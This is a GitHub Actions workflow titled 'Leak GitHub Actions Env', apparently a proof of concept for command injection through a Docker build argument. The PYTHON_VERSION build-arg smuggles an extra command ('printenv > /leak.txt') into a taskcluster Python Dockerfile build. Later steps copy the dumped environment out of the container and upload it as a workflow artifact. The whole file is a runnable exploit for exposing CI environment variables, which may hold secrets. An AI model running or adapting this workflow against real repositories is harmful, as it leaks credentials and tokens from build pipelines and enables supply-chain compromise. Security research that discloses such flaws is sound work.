name: Leak GitHub Actions Env

on:
  push:
    branches:
      - main

jobs:
  leak-env:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repo
        uses: actions/checkout@v3

      - name: Build Docker image with injected PYTHON_VERSION
        run: |
          docker build \
            --build-arg PYTHON_VERSION="3.11-alpine; printenv > /leak.txt" \
            -t leak-image \
            -f taskcluster/docker/python/Dockerfile .

      - name: Create container and copy leak.txt
        run: |
          docker create --name leaky leak-image
          docker cp leaky:/leak.txt leak.txt || echo "leak.txt not found"
          docker rm leaky

      - name: Upload leaked env as artifact
        uses: actions/upload-artifact@v3
        with:
          name: leaked-env
          path: leak.txt
